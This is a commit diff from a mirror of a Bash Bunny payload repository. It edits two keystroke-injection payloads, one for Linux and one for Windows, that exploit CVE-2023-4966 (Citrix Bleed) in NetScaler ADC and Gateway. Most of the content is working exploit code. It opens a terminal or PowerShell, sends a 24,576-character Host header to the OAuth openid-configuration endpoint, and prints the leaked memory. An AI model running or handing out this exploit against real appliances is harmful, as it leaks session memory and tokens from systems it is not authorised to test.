hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

$ -> \$

pull/671/head
Aleff 2024-06-11 08:13:22 +02:00
parent fd03dfda79
commit 463acb8559
2 changed files with 34 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt
View File

@ -1,38 +1,38 @@
* REM ##################################################################################
* REM # #
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
#################################################################################
# #
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Citrix NetScaler ADV; NetScaler Gateway #
# #
#################################################################################
ATTACKMODE HID
QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
# 1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'
QUACK DELAY 3000
QUACK CTRL-ALT t
QUACK DELAY 1000
QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
QUACK STRING header_value=\$(yes a | head -n 24576 | tr -d '\n')
QUACK ENTER
QUACK DELAY 500
QUACK STRING headers=\"-H 'Host:$header_value'\"
QUACK STRING headers=\"-H 'Host:\$header_value'\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING response=$(curl -s -k -H \"$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10)
QUACK STRING response=\$(curl -s -k -H \"\$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10)
QUACK ENTER
QUACK DELAY 500
QUACK STRING if [ $? -eq 0 ] && [ \"$(echo $response | cut -c 1-3)\" == \"200\" ]; then
QUACK STRING if [ \$? -eq 0 ] && [ \"\$(echo \$response | cut -c 1-3)\" == \"200\" ]; then
QUACK ENTER
QUACK DELAY 500
QUACK STRING echo \"--- Dumped memory ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING echo \"$response\" | cut -c 131051-
QUACK STRING echo \"\$response\" | cut -c 131051-
QUACK ENTER
QUACK DELAY 500
QUACK STRING echo \"--- End ---\"

38
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
View File

@ -1,50 +1,50 @@
* REM ##################################################################################
* REM # #
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
##################################################################################
# #
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Citrix NetScaler ADV; NetScaler Gateway #
# #
##################################################################################
ATTACKMODE HID
QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
#1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'
QUACK DELAY 3000
QUACK DELAY 1500
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000
QUACK STRING $header_value = 'a' * 24576
QUACK STRING \$header_value = 'a' * 24576
QUACK ENTER
QUACK DELAY 500
QUACK STRING $header_value = $header_value -replace \"\n\", \"\"
QUACK STRING \$header_value = \$header_value -replace \"\n\", \"\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers=\"-H 'Host:$header_value'\"
QUACK STRING \$headers=\"-H 'Host:\$header_value'\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers = @{'Host' = $header_value}
QUACK STRING \$headers = @{'Host' = \$header_value}
QUACK ENTER
QUACK DELAY 500
QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
QUACK STRING \$uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
QUACK STRING \$response = Invoke-RestMethod -Uri \$uri -Headers \$headers -Method GET -TimeoutSec 10
QUACK ENTER
QUACK DELAY 500
QUACK STRING if ($response.Substring(0, 3) -eq \"200\") {
QUACK STRING if (\$response.Substring(0, 3) -eq \"200\") {
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host \"--- Dumped memory ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response.Substring(131050) # 131051 - 1
QUACK STRING \$response.Substring(131050) # 131051 - 1
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host \"--- End ---\"